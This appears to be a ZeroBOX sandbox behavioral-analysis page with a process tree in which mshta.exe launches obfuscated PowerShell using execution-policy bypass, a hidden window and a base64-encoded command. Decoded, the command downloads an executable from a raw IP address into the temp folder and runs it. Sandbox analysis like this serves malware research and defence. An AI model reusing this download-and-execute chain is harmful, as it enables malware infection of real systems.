| ZeroBOX

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\65.hta
2564
- POWErsHeLl.exE "C:\Windows\SYstem32\winDowSPOweRsHELL\v1.0\POWErsHeLl.exE" "pOWeRSHELL.eXE -Ex bYpASs -NOp -W 1 -ec IABbAG4AZQBUAC4AcwBlAFIAVgBJAEMARQBwAE8AaQBuAHQAbQBBAE4AYQBnAEUAcgBdADoAOgBTAEUAQwB1AFIAaQB0AFkAUAByAG8AdABPAEMATwBMACAAIAAgACAAIAAgACAAIAAgACAAIAA9ACAAIAAgACAAIABbAE4ARQBUAC4AUwBlAEMAdQBSAGkAdABZAHAAcgBvAHQAbwBDAE8ATABUAHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgACAACQAgACAAIAAJAAkAIAAgAAkAIAA7ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAVwBHAGUAdAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAxADkAMgAuADMALgAyADQAMwAuADEANQAdICAAIAArACAAHSA3AC8ANgA1AC8AdwBpAG4AYQAdICAAIAArACAAHSBwAC4AZQAdICAAIAArACAAHSB4AB0gIAAgACsAIAAdIGUAHSAgACkAIAAgACAAIAAgACAAIAAgACAALQBPAFUAVABmAGkATABlACAAIAAgACAAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAdABFAG0AcABcAEgAQwBMAF8AQwBlAG4AdABvAGkAaQAuAGUAeABlAB0gIAA7ACAAIAAgAFMAVABBAHIAdAAgAAkAHSAkAEUAbgBWADoAVABFAG0AcABcAEgAQwBMAF8AQwBlAG4AdABvAGkAaQAuAGUAeABlAB0g "
  2648
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYpASs -NOp -W 1 -ec IABbAG4AZQBUAC4AcwBlAFIAVgBJAEMARQBwAE8AaQBuAHQAbQBBAE4AYQBnAEUAcgBdADoAOgBTAEUAQwB1AFIAaQB0AFkAUAByAG8AdABPAEMATwBMACAAIAAgACAAIAAgACAAIAAgACAAIAA9ACAAIAAgACAAIABbAE4ARQBUAC4AUwBlAEMAdQBSAGkAdABZAHAAcgBvAHQAbwBDAE8ATABUAHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgACAACQAgACAAIAAJAAkAIAAgAAkAIAA7ACAACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAVwBHAGUAdAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAxADkAMgAuADMALgAyADQAMwAuADEANQAdICAAIAArACAAHSA3AC8ANgA1AC8AdwBpAG4AYQAdICAAIAArACAAHSBwAC4AZQAdICAAIAArACAAHSB4AB0gIAAgACsAIAAdIGUAHSAgACkAIAAgACAAIAAgACAAIAAgACAALQBPAFUAVABmAGkATABlACAAIAAgACAAIAAgACAAIAAgACAAHSAkAGUAbgB2ADoAdABFAG0AcABcAEgAQwBMAF8AQwBlAG4AdABvAGkAaQAuAGUAeABlAB0gIAA7ACAAIAAgAFMAVABBAHIAdAAgAAkAHSAkAEUAbgBWADoAVABFAG0AcABcAEgAQwBMAF8AQwBlAG4AdABvAGkAaQAuAGUAeABlAB0g
    2820

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents